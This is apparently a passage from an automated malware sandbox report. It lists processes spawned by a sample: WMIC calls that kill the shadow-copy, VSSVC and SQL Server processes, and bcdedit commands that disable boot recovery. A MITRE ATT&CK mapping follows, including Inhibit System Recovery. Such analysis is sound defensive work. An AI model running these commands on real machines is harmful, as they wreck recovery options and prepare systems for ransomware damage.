C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
3⤵
PID:3992

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
3⤵
PID:1068

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
3⤵
PID:1252

C:\Windows\system32\bcdedit.exe
"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
3⤵
- Modifies boot configuration data using bcdedit
PID:408

C:\Windows\system32\bcdedit.exe
"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
3⤵
- Modifies boot configuration data using bcdedit
PID:1060

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:3340

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Modify Registry

2

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads